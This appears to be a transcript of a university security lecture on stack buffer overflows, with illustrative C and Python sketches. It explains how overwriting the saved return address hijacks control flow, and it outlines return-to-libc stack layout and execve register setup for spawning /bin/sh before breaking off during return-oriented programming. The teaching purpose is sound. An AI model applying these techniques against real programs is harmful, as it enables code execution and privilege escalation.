Alright folks, I hope you all made progress on assignment 7. Final next week, everyone stoked? Last week of class, also excited? Not as excited. Okay, cool. Today we're going to finish out application security by really digging in and understanding what goes on when a buffer overflow occurs. So, somebody remind me, what is the cdecl calling convention? You know, this close to the final, the fewer answers I get, the more difficult the exam gets. What is the rough order of steps involved? So, params are pushed on the stack from right to left, and then the address of the next instruction. Where does that address usually come from? Which assembly instruction pushes it onto the stack? The call instruction, exactly. Cool. And then what is the callee doing, the function that got called? It saves the base pointer, and then what? It also allocates space for local variables, and once it's done it undoes that: it pops the saved base pointer off the stack back into the base pointer. So when we call a function, essentially two of our registers are saved onto the stack. One is the base pointer, so we have the saved EBP, and then we also have the saved EIP, which is where we're going to come back to when we're done executing.
So again, think about memory. Are there any restrictions on what memory on the stack your program can read and write to? No. Why not? Because it's the stack, and the program needs to read and write it. We started off by saying the stack is the scratch memory for your program, so it needs to be able to read and write it. Yeah?
So the question was about call by reference versus call by value. You can think of call by reference like this: the compiler pushes a pointer onto the stack as the argument, and when the function changes the value it dereferences that pointer, so that's why the caller's copy gets changed. Pass by value means the actual value gets copied, so the function gets a fresh copy and any changes it makes don't show up in the caller. So it's actually very similar, because x86 doesn't have any of these concepts, pass by reference or pass by value. The compiler has to trick you into thinking that's what happened, based on how it compiles the function. It's a similar thing in Java. In Java, do you ever think about pointers? No. But do pointers essentially exist in Java? Yeah. If you've ever passed an object into a function and that function changed a field of your object or called methods on it, that's in some sense a pass-by-reference type of thing, but under the hood it's just passing a pointer to that object. Cool.
Okay, so what would happen if an attacker is able to control the saved instruction pointer that's on our stack? What could they theoretically do? Yeah? You could change where the program continues after the function returns. Right. It's important to remember that at the very end of a function, the return instruction essentially says: whatever the saved instruction pointer on the stack is, start executing code from there. There's nothing that says start executing code from the instruction that called me, because that information is stored on the stack. Yeah? And by changing the saved EBP we may be able to change the base pointer that gets restored when we return, so we may be able to essentially move our function frame around, which is pretty cool.
So let's look through an example of this. Here I have a very simple function called my copy. What is my copy doing? What are the semantics of that function? Yeah, it takes a character pointer argument, so a pointer to some character array, and it's going to copy that into foo. What is foo? Yeah, a four-character buffer. It's a local variable, so we know it's allocated on the stack. What are the semantics of strcpy? It keeps going until it sees a null terminator. Yeah, so it copies all the characters from the string into foo. These are just pointers, pointers to memory regions. First it tests: does the string pointer point to a null byte? If it points to a null byte, what does that mean? Why does it stop? It's the end of the string, right. In C, a string is a series of characters followed by a zero, a null byte. So basically: test whether the character we're pointing to is null. If it is, stop. If it's not, copy it to where foo points, increment each pointer by one, and keep doing the same thing.
So how does strcpy know that the buffer foo only has four bytes allocated for it? It doesn't. It doesn't have any way of knowing. We'll get into this in a bit, but fundamentally, if you control the source string and can make it as big as you want, there's no possible way for the programmer to tell strcpy to only copy four bytes from the string into foo. So how could you do this safely? Yeah, maybe you could write your own for loop, but what do you have to keep in mind to be safe? Or you could use a different function, strncpy, and have it copy only four bytes, because you know the size of foo. What else could you do if you were dead determined to use strcpy?
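To make the copy loop described above concrete, here is a minimal sketch in C. The names naive_strcpy and bounded_copy are hypothetical helpers written for illustration, not the library's implementation. The first mirrors the test, copy, increment loop and has no idea how large the destination is; the second takes the destination size as a parameter, in the spirit of strncpy, and always null-terminates (which plain strncpy does not guarantee when the source is too long).

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical re-implementation of what strcpy does, for illustration only.
 * It stops only at src's null byte; the size of dst is never consulted. */
char *naive_strcpy(char *dst, const char *src)
{
    char *out = dst;
    assert(dst != NULL && src != NULL);
    while (*src != '\0') {   /* test: is the source byte null? */
        *out = *src;         /* copy one byte */
        out++;               /* advance both pointers by one */
        src++;
    }
    *out = '\0';             /* the terminating null byte is copied too */
    return dst;
}

/* Bounded alternative: never writes more than dst_size bytes and always
 * null-terminates. Returns the number of characters copied. */
size_t bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t i = 0;
    assert(dst != NULL && src != NULL);
    if (dst_size == 0) {
        return 0;
    }
    while (i + 1 < dst_size && src[i] != '\0') {
        dst[i] = src[i];
        i++;
    }
    dst[i] = '\0';
    return i;
}
```

With a four-byte foo, bounded_copy(foo, sizeof foo, str) silently truncates to three characters plus the null byte. Whether truncation or an error is the right behavior depends on the program.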
Yeah, check the length of the string. If strlen of str is greater than what fits in four bytes, then throw an error or return null or whatever you're going to do to signify that it doesn't work. Then we have our main function. In main we pass a string into my copy, we print out "after", and we return zero. So this is a tip, I guess, if you're ever making slides for anything: don't put the date or a specific class number in them, because I've reused these many times since.
So then we have to look at the assembly code of this program. What is the first thing that main has to do? Store the base pointer, right. It goes back to the calling convention: main must store the base pointer of whoever called it. So first, push EBP, to store the saved base pointer on the stack. Let's think for a minute. Right when main is called, what's currently on the stack? If we were to draw the stack diagram, what is the stack pointer pointing to when main is called? How did we get to this function? The address of main? Sorry, I couldn't hear you. Push EBP? We haven't pushed the base pointer on the stack yet. Let's say we are right before this push EBP instruction, and somebody has called us. So what's on the stack right now? Yeah, very close: the saved instruction pointer, the address of where we should go after main is done. For every function that must be there, because we're going to return and jump to whatever is on the stack at that point. It's just a helpful double check. So we're going to first push EBP, then set up our base pointer by moving the stack pointer into the base pointer. We're then going to subtract hex 10, so 16, from the stack pointer.
We're then going to move some constant value, 0x8048504, to where the stack pointer points. What's this value? The address of the function? No, not quite. I guess theoretically it could be, but it's not. Yeah? It's the parameter. Yeah, but what is that? The address of the string? Yes, it's the address of the string, perfect. It helps to look at the next line, the call to my copy, so we can see that's what the address is for. We're passing in a character pointer. We can look at the function signature of my copy: it takes in a character pointer. Why is it this value, 0x8048504? Yeah, it's where the compiler decided to store the string. We have this constant string, and it has to be stored somewhere in memory, so the compiler says, I'm just going to pick that place. There's a little bit more to how this is actually specified, but essentially it doesn't really matter. So when this program loads, what's going to be the byte at 0x8048504? Yeah, the hex representation of a. And then plus one from that will be the hex representation of s, and plus one from that will be the hex representation of u, and so on. The compiler needs to store this string somewhere. Yeah?
So is that hex value pretty much always going to change every time the program runs? There's nothing valuable to take from it? I'd say it won't change every time you run, but every time you compile the program the compiler could decide to put it somewhere different. So yeah, this is in some sense arbitrary, except that for our program to be correct these bytes must be at that memory location. Yeah? Is the memory address local to the memory given to the program, or is that number universal? Local. Every process has its own view of memory.
Every process is tricked into thinking it has full access to memory from 0 to 0xFFFFFFFF. Got it, okay. So we call this function, and what must happen after this? Look at the C code of main. Let's assume my copy returns. What's the next thing that has to happen in this function? Do we do anything with the return value of my copy? No. We call the printf function, passing as the parameter a pointer to the string "after", which is probably very similar to what we just did. And then we return 0. So there should be another move, this time into EAX first and then moving EAX onto the stack. Why did it choose to do this differently than the other one? I have absolutely no idea. But we do this, so we're moving 0x8048517. What is that? That's a pointer to the string "after". The string "after" is just the bytes a, f, t, e, r, and a 0. You know there must be a null byte at the end. Then we call printf, stuff happens. Then we move 0 into EAX, leave, and return. So that's all the functionality of main, compiled. Good.
And leave? Good question for the class. What does leave do? It pops the instruction pointer off the stack? Return does that. What about leave? It gets ready to leave, right. Remember, while we're executing some function, the base pointer points somewhere a little bit higher up, and the stack pointer has moved down to allocate memory on the stack. What leave does is undo all of that. It copies the base pointer into the stack pointer, which moves the stack pointer up to where the base pointer is. At that moment we are pointing at the saved base pointer, and then it does a pop EBP to restore the base pointer. And then return essentially pops the saved instruction pointer off the stack into EIP.
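The prologue, leave, and return steps described above can be sketched as a toy machine model in C. This is an illustration under stated assumptions, not how a CPU is implemented: the Machine struct, the STACK_TOP constant, and the helper names are all hypothetical, and the model only covers a small window of word-aligned stack addresses.

```c
#include <assert.h>
#include <stdint.h>

#define STACK_TOP   0xfd300u   /* illustrative address, not a real layout */
#define STACK_WORDS 64u

typedef struct {
    uint32_t esp, ebp, eip;
    uint32_t mem[STACK_WORDS];  /* words covering [STACK_TOP - 256, STACK_TOP) */
} Machine;

/* Map a word-aligned address inside the modeled window to its storage. */
static uint32_t *word_at(Machine *m, uint32_t addr)
{
    uint32_t base = STACK_TOP - 4u * STACK_WORDS;
    assert(addr >= base && addr < STACK_TOP && addr % 4u == 0);
    return &m->mem[(addr - base) / 4u];
}

void push(Machine *m, uint32_t value) { m->esp -= 4; *word_at(m, m->esp) = value; }
uint32_t pop(Machine *m) { uint32_t v = *word_at(m, m->esp); m->esp += 4; return v; }

/* Function prologue: push ebp; mov ebp, esp; sub esp, locals */
void prologue(Machine *m, uint32_t locals)
{
    push(m, m->ebp);
    m->ebp = m->esp;
    m->esp -= locals;
}

/* leave is equivalent to: mov esp, ebp; pop ebp */
void leave(Machine *m) { m->esp = m->ebp; m->ebp = pop(m); }

/* ret is equivalent to: pop eip */
void ret(Machine *m) { m->eip = pop(m); }
```

Running prologue followed by leave puts esp and ebp back exactly where they started, and ret then loads whatever word sits at esp into eip. Nothing in leave or ret checks whether that word is still the value that call pushed.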
So leave moves the stack pointer back up to point at the saved base pointer. We'll walk through all this code. Leave essentially undoes these three instructions: the push EBP, the move of ESP into EBP, and the subtract of hex 10 from ESP. Okay, so then what about my copy? What does it need to do? Yeah, the first thing it needs to do is push EBP. It got called, and it has no idea from where, so it needs to store the base pointer of whoever called it. It needs to move the stack pointer into the base pointer. It then subtracts hex 28 from the stack pointer. Then it needs to call strcpy, so the arguments are going to be placed onto the stack from right to left. So we have a move of EBP plus 8 into EAX. EBP plus 8 is the string str, so this is the argument. From the base pointer, negative offsets are local variables and positive offsets are arguments. So this is picking up the value that main placed at its ESP and copying it into EAX. It then moves that from EAX into ESP plus 4, so onto the stack. Then it does a load effective address: it calculates EBP minus C and puts that into EAX. What's EBP minus C? That's foo. Yeah, that's where the compiler decided to put foo: hex C beneath EBP. And then we move that to where the stack pointer points, and we call strcpy. So we've set up the stack: at the stack pointer is the pointer to foo, and above that is our string argument. We call strcpy, and we don't need to do anything with its return value, so we just leave and return.
All right, should we walk through this so we see what happens when we run it? Cool. So, four registers this time. We have the code, which is just how the compiler decided to lay it out. We have our stack. The stack pointer currently points to 0xfd2d4, and the base pointer is currently 0xfd2e0. And EIP is right here, which means this is the next instruction to be executed.
So the first instruction executes. What happens? Push EBP. We're pushing the value of EBP on the stack, and the stack pointer goes down. We've now saved the base pointer. Move the stack pointer into the base pointer, so now we're setting up our base pointer for main. Subtract hex 10 from ESP. The base pointer isn't drawn here; you can imagine there's another arrow. The stack pointer is now at 0xfd2c0. Then we're moving... so what was this 0x8048504? Yeah, that's the address of our string, that long string we had. And the subtract is making room. Main did not have any local variables, but main is calling a function, so the compiler decided to give us 16 bytes there for our local stack. And then it's going to copy this value onto the stack so that it can call the function. Why 16? Compilers do things for lots of reasons. I think it's one of those things where it needs to store at least four bytes on the stack, but that's a weird offset, so it does 16 bytes.
All right, so we move this value onto the stack. Now, as the caller, based on the calling convention, we've done everything we need to do to set things up. We've placed the argument to the function on the stack. Now we need to call it. What does this call instruction do? Call jumps to 0x80483f4, and what else? It pushes what onto the stack? Very close. Not the address of my copy. The address after the call to my copy, exactly: 0x8048423. Essentially this is the breadcrumb. When we call a function, we need to know how to get back, where to go after the function finishes executing. So we call my copy, and we push 0x8048423 onto the stack, which is this instruction here, the one right after the call to my copy. So again we're in the situation where a new function just got called, my copy, and we can see visually in this example that the stack pointer is pointing exactly at the return address, the saved instruction pointer.
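As a quick check on the addresses in the walkthrough above, here is a small arithmetic sketch in C. It only tracks the two registers and does not model memory. The Regs struct and function names are hypothetical; the starting values (ESP at 0xfd2d4, EBP at 0xfd2e0) are the ones read off the slide in the lecture.

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    uint32_t esp;   /* stack pointer */
    uint32_t ebp;   /* base pointer */
} Regs;

/* push ebp; mov ebp, esp; sub esp, locals */
Regs after_prologue(Regs r, uint32_t locals)
{
    assert(locals % 4u == 0);
    r.esp -= 4;          /* push ebp: the old ebp is stored at the new esp */
    r.ebp = r.esp;       /* mov ebp, esp */
    r.esp -= locals;     /* sub esp, locals */
    return r;
}

/* call pushes the return address, so esp drops by 4 */
Regs after_call(Regs r)
{
    r.esp -= 4;
    return r;
}
```

Starting from the slide's values, the prologue with hex 10 of locals leaves EBP at 0xfd2d0 and ESP at 0xfd2c0, and the call then leaves ESP at 0xfd2bc, which is where the return address 0x8048423 ends up.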
So what does my copy do? Push EBP, saving main's base pointer onto the stack. So going bottom up, we have the saved base pointer, then the saved instruction pointer, and above that the argument to the function. Then we move the stack pointer into the base pointer to set up our base pointer. We need a bunch more room, so we then subtract hex 28 from ESP. Again, another example: why hex 28? I have no idea. Because the compiler decided to do that. How much space did it need for our buffer? Four bytes, right? It was a four-byte buffer, but it decided to give us hex 28 bytes, so 40, and it decided to put the buffer at, let's see, 12. Yeah, 12 bytes below the base pointer.
All right, so what's at EBP plus 8? The address of the string, which to my copy is the argument of the function. And why is it EBP plus 8? Yeah, exactly: there's the saved base pointer and then the saved instruction pointer. So at EBP is the saved base pointer, at EBP plus 4 is the saved instruction pointer, and at EBP plus 8 is the first argument. And from then on, EBP plus 12 would be the second argument, then the third argument, the fourth argument. Yeah? Where does that base pointer come from again? Where's it pointing to? Is that from what called main? This base pointer? Okay, so this saved base pointer is main's base pointer. So 0xfd2d0 is here. Or should it be above that? Let's walk back slightly. I thought I must have messed that up, but no, that's right. This is 0xfd2d4, this is 0xfd2d0. Okay, yes. And then this other base pointer is the base pointer of the function that called main. It kind of keeps going up. You could walk this chain to figure it out. Okay, so we've moved EBP plus 8 into EAX. We move EAX into ESP plus 4.
What's the difference between the move of EBP plus 8 into EAX and the load effective address of EBP minus C into EAX? What did the move instruction do? It takes the value stored at that position? Yes. And the second just calculates the address from EBP. So again, it comes back to pointers. Another way to think about the move is as a pointer dereference. It says: calculate EBP plus 8, and whatever that memory location is, dereference it, grab that value, and copy it into EAX. So like we said, move the data stored at EBP plus 8 into EAX. Literally copy those bytes from here to here, and then copy that onto the stack. Then what is this load effective address doing? Load effective address essentially means compute the address, but don't dereference it. So what is EBP minus C? EBP minus C is 0xfd2ac. Move that value, not the memory that's stored there, into EAX. So after we do this, EAX will have the value 0xfd2ac. Does that make sense? Then we move that onto the stack. So we have 0xfd2ac on the stack and then 0x8048504 above that. We've essentially pushed all the arguments to strcpy onto the stack from right to left.
So we're about to call strcpy. What's going to happen? The call is going to push the address of the leave instruction, 0x804840c, onto the stack. strcpy is going to do what it does, but what is it going to do here? Yeah, it basically seems smarter than it is, right?
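The distinction above between a move with a memory operand and load effective address can be sketched in C as the difference between dereferencing a computed address and just returning it. This is a toy model: the Memory struct, MEM_BASE, and the function names are hypothetical, and the addresses are the ones from the walkthrough (EBP at 0xfd2b8 inside my copy).

```c
#include <assert.h>
#include <stdint.h>

#define MEM_BASE  0xfd280u   /* start of the modeled window (illustrative) */
#define MEM_WORDS 32u

/* Toy word-addressed memory covering [MEM_BASE, MEM_BASE + 4 * MEM_WORDS) */
typedef struct { uint32_t words[MEM_WORDS]; } Memory;

/* mov eax, [base + offset]: compute the address, then dereference it */
uint32_t mov_load(const Memory *mem, uint32_t base, int32_t offset)
{
    uint32_t addr = base + (uint32_t)offset;
    assert(addr >= MEM_BASE && addr < MEM_BASE + 4u * MEM_WORDS && addr % 4u == 0);
    return mem->words[(addr - MEM_BASE) / 4u];
}

/* lea eax, [base + offset]: compute the address and stop there */
uint32_t lea(uint32_t base, int32_t offset)
{
    return base + (uint32_t)offset;
}
```

With the string pointer 0x8048504 stored at 0xfd2c0, mov_load(&mem, 0xfd2b8, 8) yields 0x8048504 (the argument), while lea(0xfd2b8, -0xc) yields 0xfd2ac (the address of foo) without touching memory at all.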
So all it's going to do is dereference 0x8048504, grab a byte and copy it to 0xfd2ac, then increment by one, so copy the next byte from 0x8048505 to 0xfd2ad, and just keep going until it hits a null byte in the source. Yeah? When it does that, if you overrun the bound, would that go further down the stack or up the stack? If the string was too long? So a string pointer points to the data, and you increment it by one to get to the next element. So where does plus one go on this stack? We write up. Which means, if you start writing up from 0xfd2ac, how many bytes do you need to write before you get to the saved base pointer? Think about it this way: what is each of these squares? Four bytes. So write four bytes, get here. Write four bytes, get here. Write four bytes, and now you're starting to overwrite the saved base pointer. And actually this is very nice, because we already know the buffer is hex C bytes below: we have this load effective address of EBP minus C. So we know there are 12 bytes between the start of that buffer and the saved base pointer, which is at EBP. Does that make sense?
It's the called function's responsibility to make sure the stack is consistent when it returns. So the parameters are still on the stack? Yes. Right after this call to strcpy, the stack pointer will be exactly at the location where we left it, so these parameters will definitely still be there on the stack. So one thing we can do is overwrite that base pointer. And then what's four bytes above the base pointer? The instruction pointer. What happens if we overwrite that instruction pointer? Yeah, we can make the program go wherever we want. Where specifically? Which instruction here makes it go wherever we want? Which return are we talking about?
The return of my copy, yeah. This instruction here, this ret instruction. If we're able to alter the saved instruction pointer on the stack, which is 0x8048423, we can make it point to, and go, wherever we want. And that's the one above the base pointer, or the base pointer? This is the one above the base pointer. The saved base pointer is here at 0xfd2b8, and four above that is the saved EIP, exactly. If we're able to alter that, we can go anywhere we want. Yeah? Quick question: that C in the load effective address, is that arbitrary as well? Yes. It needs to be at least four bytes. That's the other thing that's slightly surprising about this: why didn't the compiler put foo at EBP minus 4? It could totally do that. For whatever reason it decided on EBP minus C. But this is actually why it's really important to look at the assembly. If you just looked at the C code, you might say, oh, there are only four bytes to overflow before I get to the saved base pointer, so I'm just going to write 12 bytes, because that would cover the four bytes of foo, the saved base pointer, and then the saved instruction pointer. You do that, you find out it doesn't work, and you don't understand why. You have to actually look at the code here. Exactly. You need 12 bytes just to get to the saved base pointer, and then comes the saved instruction pointer. Okay. So it always allocates a little more? I wouldn't say always, but it often does. If you had allocated 12 bytes, I think it would still put the buffer at exactly the same place. Maybe. There are also a lot of compiler options you can specify that change these things.
So okay, let's look at what happens during strcpy. What does the memory look like? Again, to remind us, at 0x8048504 is this string. So after copying, at 0xfd2ac there's going to be a, s, u, space.
Now, the weird thing, again, is endianness. If we view this as an integer, the space is the most significant byte and the a is the least significant byte, even though the a is the byte that was written first. So it's essentially backwards from what we would expect. Going up: c, s, e, space, again the same thing if we interpret that as an integer. Does it matter what these 12 bytes are? Kind of. Kind of no. What if there's a null byte in there? You can't let one in there. Yeah. If there's a null byte in here, then the copy will stop and it won't copy any more bytes. This can be tricky. This is why I keep harping, if you come to office hours or whatever, on what the man page says the specific semantics of the function are. Sometimes when you're doing these things, if your input has a newline in it, some functions only read up to a newline, so you won't actually get all your data in past the newline. Null bytes are a similar problem.
And we keep going. So then we have "fall", f, a, l, l. And now we've overwritten the saved base pointer. Does the program crash at this point? We've overflowed a buffer. Shouldn't the program crash? No, because this is memory that it can read and write to. It has permissions to read and write all of this memory on the stack. It can keep going all the way up. At some point you will run off the end of the stack and cause a seg fault just by writing, but in our little example here that will definitely not happen. It'll keep going, overwriting the saved instruction pointer on the stack, then overwriting the argument above that, and it keeps going up until it hits a null byte. The one thing I did not mention here that definitely happens is that the null byte is also copied, so technically there will be a null byte here at the end. That can affect things sometimes. But the one we're targeting is the instruction pointer. That's the one we want to write.
It's the easiest way to bend the control flow to your will and change where the program goes. Okay, so now my copy returns. Does my copy know that its stack has been messed with? No. What does it do? It does whatever these instructions say it should do. There's no additional checking. Everything you need to understand exactly what's happening is contained in these assembly instructions. So we have leave. What does leave do? It copies the base pointer into the stack pointer, so the stack pointer now points at the saved base pointer, and then there's a pop into EBP. So what should happen is the base pointer gets the value 0x6c6c6166. Does that crash anything? No. When would it crash something? If we tried to dereference it, exactly. If we had another instruction somewhere after this that said dereference the base pointer and grab something, that memory region is likely unmapped, so we'd get a seg fault because we tried to access memory that's unmapped.
So now we do the return. Now what happens? Yeah, now we essentially do a pop into EIP. So we're going to try to start executing from 0x31303220, and that will crash the program. That will cause the seg fault. If you do this, compiling this example with GCC and running a.out, you'll see that familiar "Segmentation fault (core dumped)". And if you debug this in GDB, you will see that it received a seg fault, specifically at 0x31303220: it tried to access that and could not. Looking at the registers, we can see that EBP is 0x6c6c6166 and EIP is 0x31303220. Core dumps are actually very nice too, because you can load the core dump of a program that's not even running anymore and look at the registers and the state of the program at the moment it crashed. So, question one: where did this string come from? Yeah. Exactly, it's hard coded. We as the developer coded that string up.
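The register values from the crash can be reproduced without invoking any undefined behavior by modeling the frame as a plain byte array. This is a sketch under assumptions: the offsets come from the walkthrough (foo at EBP minus hex C, saved EIP four bytes above the saved EBP), the function names are hypothetical, and the test string is inferred from the register values in the lecture. The transcript does not show the full string, and the bytes "340 " in particular are a guess.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum {
    FOO_OFFSET       = 0,   /* foo sits at ebp - 0xc */
    SAVED_EBP_OFFSET = 12,  /* 0xc bytes above the start of foo */
    SAVED_EIP_OFFSET = 16,  /* 4 bytes above the saved ebp */
    FRAME_BYTES      = 32   /* size of the model, not of the real frame */
};

/* Read a 32-bit little-endian value, the way x86 interprets 4 bytes. */
uint32_t read_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Copy src into the model frame starting at foo, with no bound tied to
 * foo's 4 bytes, just like strcpy. The assert protects only the model. */
void overflow_model(unsigned char frame[FRAME_BYTES], const char *src)
{
    size_t n = strlen(src) + 1;   /* strcpy copies the null byte too */
    assert(n <= (size_t)(FRAME_BYTES - FOO_OFFSET));
    memcpy(frame + FOO_OFFSET, src, n);
}
```

Copying a string that begins "asu cse 340 fall 201" leaves the bytes f, a, l, l in the saved EBP slot, which read as the little-endian integer 0x6c6c6166, and the bytes space, 2, 0, 1 in the saved EIP slot, which read as 0x31303220. Those are the two values GDB reports.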
What if that string came from a program argument? Yeah, then the user, or an attacker, essentially controls it. And what registers can they then control? Yeah, EIP. What else? EBP. And EBP, right. Cool. So going back for a second here. Yeah? I remember from last class that return would pop the return value of the function, but there is no return value here, so what does it do? No, no. The return value itself is put into EAX. The return instruction pops whatever the stack pointer is currently pointing to into EIP, the instruction pointer. So basically it says: go jump to whatever value is currently on top of the stack, which should have been the next instruction of the function that called us. In this case, it should have been this value, 0x8048423.
So then where could we go in this program? Anywhere. We could actually just make this program jump back to main and have it do this again, and it would loop forever. We could have it go to my copy and copy more stuff, and probably crash at some point because the pointers are really messed up by then. But we don't have to do that. We can jump to any of these addresses, and technically we can even jump into the middle of an instruction. You see here, how many bytes is this? I can't do this math. A lot of bytes in between here. So you could jump in between these instructions, putting together bytes of two instructions to make something that might or might not be an instruction? Exactly, exactly. So let's say there's an admin function, some admin functionality that gives you access as an admin when it's called. All you have to do is change this saved instruction pointer on the stack to go to that function.
And then as soon as my copy returns, it would start executing that function. Yeah? Can you only jump to memory locations that are already part of this program, or can you jump to pretty much anywhere in RAM? Technically you can jump to anywhere in the process's memory. It gets slightly more complicated, and I'm ignoring this a little bit for now, because of the different permissions on memory regions. Memory regions typically have some combination of read, write, and execute permissions. For instance, it used to be that the stack itself was executable. So you could essentially write assembly instructions onto the stack and jump back onto the stack itself to start executing code of your choosing. Crappy IoT devices are still done this way, for terrible reasons. Most modern systems disable execution on the stack, and we're going to go over, in a second, how to get beyond that. So if we can execute code of our choosing, then great. Oftentimes now that is not feasible. There are plenty of resources and techniques for learning how to do shellcode and all this other stuff to actually do that, but for right now we're going to ignore it. And no, usually the instructions are read and execute, and not writable. The entire concept is that writing and executing are exclusive: a memory region can be writable or executable, but never both. This helps prevent things, but we'll see super clever ways around it.
But first I want to talk about functions that are essentially vulnerable by default. Specifically gets. gets reads from standard input until it gets to, I believe, a newline or end of file, and stores that into a buffer, but it takes literally no length. This is a 100% dangerous function. It is literally impossible to use gets safely, because you can't tell gets how many bytes to copy.
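By contrast with gets, the standard fgets function takes the buffer size as a parameter, so the caller can bound the read. The following is a minimal sketch, assuming a hypothetical helper named read_line; it is one reasonable way to wrap fgets, not the only one.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: read at most size - 1 characters of one line into
 * buf and null-terminate it. Returns 0 on success, -1 on end of file or
 * error. Unlike gets, the caller states how large the buffer is. */
int read_line(FILE *in, char *buf, int size)
{
    assert(in != NULL && buf != NULL && size > 0);
    if (fgets(buf, size, in) == NULL) {
        return -1;
    }
    buf[strcspn(buf, "\n")] = '\0';   /* strip the newline if one was read */
    return 0;
}
```

If the line is longer than the buffer, the remainder stays in the stream for the next read. A caller that needs whole lines has to detect and handle that case.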
The same goes for strcpy, strcat, sprintf (so printing into a string), scanf, and custom input routines. But now we need to talk about how to exploit this. Once you control the instruction pointer, you can turn that into arbitrary code execution. There is actually this great paper called "Smashing the Stack for Fun and Profit", if you want to learn about the older style of shellcode and jumping onto an executable stack, all this fun stuff. So what is our high-level goal as an attacker? What do we want to do? Yeah, we want to make the program do something that it's not supposed to do based on its security policy. Going all the way back to the beginning: the program has a security policy of things that it should do, and we're trying to make it violate that policy. So that could be for a setuid program that is setuid root. We want to trick it into doing stuff that we want it to do. Maybe we want it to add us to a level or a group or something. In some sense, we want that program to execute code of our choosing. The program has its functionality, its own code. We want to trick it into doing whatever we want, because our code then runs with the same privilege as the application. So one thing we really want to do is just call /bin/sh. This is where the term shellcode comes from. We want some code that executes a shell, /bin/sh, so that we can run whatever commands we want with the permissions of that user. Really, it's just assembly code to perform a specific purpose. So we can write some assembly code, and we can write it very carefully so that it has no nulls and no newlines. There are plenty of resources for that if you want to get into it. But as I mentioned, the problem with injecting our code is the question of where. If we have code that we want to run, where do we execute that code?
Or where do we put that code? If the program has the correct memory permissions, such that nothing is both writable and executable, that means we can't write to anything that is executable, so we can't inject our code anywhere. So this brings up a super cool exploitation technique called return-oriented programming, which is getting closer and closer to the pinnacle of what modern exploitation is. So as we talked about, one way would be to call a function, right? Actually, going back a bit. We said we could call a function: we can point the saved instruction pointer at another function. That way the return will go to that function. Where does that function get its arguments? Yeah, where does a function that is called get its arguments from? Yeah, so it gets them relative to the base pointer, right? So in this example of mycopy, EBP plus 8, and EBP comes from the stack pointer, right? Everything's on the stack. Who controls the stack in this case? We've completely changed the contents of the stack. So not only can we decide what functions get called, we can actually change the arguments to those functions to other things that we want to have happen. And one of the cool things is this technique called return-to-libc, which basically says, okay, maybe I can just reuse libc. libc has this nice function called system. I can just jump to system and pass the argument /bin/sh. And then at that point, I've executed a shell and I've reused the code of the application. I'm not using any of my own code. Return-oriented programming goes a little bit farther and says, what if we execute just little snippets of code that, combined in a crazy way, actually do what we want? So we'll walk through this. It was introduced in 2005, so it's an old-ish technique, but it's much newer than the stack-smashing paper.
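The return-to-libc idea can be sketched as the three words an attacker would place on the stack starting at the saved instruction pointer. This is only an illustration under the cdecl convention described in the lecture: when `ret` jumps into a function, that function expects its own return address at the top of the stack and its first argument right after it. Both addresses below are hypothetical placeholders, not values from any real binary, and `ret2libc_words` is a made-up helper name.

```python
import struct

SYSTEM_ADDR = 0x08051234  # hypothetical address of libc's system()
BINSH_ADDR = 0x080C5678   # hypothetical address of a "/bin/sh" string in memory


def ret2libc_words(system_addr, binsh_addr, fake_ret=0x41414141):
    """Bytes that overwrite saved EIP and the two stack slots after it.

    Slot 0: where main's `ret` goes (system).
    Slot 1: what system() sees as its own return address (junk here).
    Slot 2: what system() sees as its first argument.
    """
    return struct.pack("<III", system_addr, fake_ret, binsh_addr)


frame = ret2libc_words(SYSTEM_ADDR, BINSH_ADDR)
ret_target, callee_ret, callee_arg0 = struct.unpack("<III", frame)
print(hex(ret_target), hex(callee_ret), hex(callee_arg0))
```

The junk return address means the program would likely crash once the shell exits; a real chain usually puts something meaningful there.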
There's a really cool paper here. It's called The Geometry of Innocent Flesh on the Bone, super cool title for a paper: Return-into-libc without Function Calls. Okay, so let's look at an example. I think this will help. So, a main function, a buffer foo, a strcpy of argv[1] into foo, return 10. Easy? Simple? Simple program. We don't even have any other functions we're going to call. Is this vulnerable? Yes. Why? Because of strcpy, specifically with arguments that an attacker controls, right? So strcpy by itself is not always vulnerable. It depends: if the attacker can give input that's bigger than the buffer, then it can trigger a buffer overflow. So what's the first instruction of main? Push EBP. Awesome. Then set up our base pointer: move the stack pointer to the base pointer, subtract 0x3C from ESP, move EBP plus 0xC into EAX. What's EBP plus 0xC? What's EBP plus 8? EBP plus 8 is the first argument, which in this case is argc. So EBP plus 0xC is argv. Then we add 4 to EAX. Why do we add 4? Index 1. Yeah, so we're getting argv as a pointer and indexing 1 into that array, which means adding 4. And then we're dereferencing that by moving whatever it points to into EAX. So this finally gets us a pointer to the string that was passed in as argv[1]. Then we move that onto the stack. We then load the effective address of EBP minus 0x32. Is 0x32 50? Yeah, so here it allocated exactly the amount of space it needed. Then move EAX to where ESP points, call strcpy, move 10 into EAX, leave, and return. So that's the program. We can compile this. We can look at this. So one thing different here from the other compilations is we're using the -static option. So what is that? Not quite. That's no-PIE, I believe, which you may also need for this, but yeah. Yes, so libc, right? libc is a bunch of code. It's a library. Normally when you call a library function, it is dynamically loaded into your process, your application.
But statically, it's compiling all that code into one binary. So all of libc is included here, because we need this strcpy function. And we can see that it's 716 kilobytes, which is a lot. This has, we won't get into it, a lot of nice properties. But we assume the program is compiled like this. Okay, so we first need to find little gadgets in the program that we can reuse to essentially encode our shellcode idea of calling system or execve on /bin/sh. So we want to invoke /bin/sh. And what do we need to do that? We look at system calls on x86. To call execve, we need the value 0xb in eax; that's execve. We need the address of the string /bin/sh in ebx. We need in ecx the address of an array that holds the address of /bin/sh and then null. And finally, we need null in edx. But we need to figure out where to put /bin/sh. We need the string /bin/sh somewhere in memory. The readelf command is something you can use to look at a binary, and it gives you this nice ridiculous table; don't let it scare you. It shows you all the different memory areas of the program and what their permissions are. The thing we're interested in here is this column, the Flg column, the flags. The X means executable, the W means writable. So we need something that's writable. Let's say we are going to target this .data section. The nice thing about this is it says this section is at address 0x080ea060, and the memory at that address will be writable. So if we can write the string /bin/sh there, now we've got that string somewhere in memory. We'll keep this information in our pocket as we look at this file. So okay, if we need to write this string 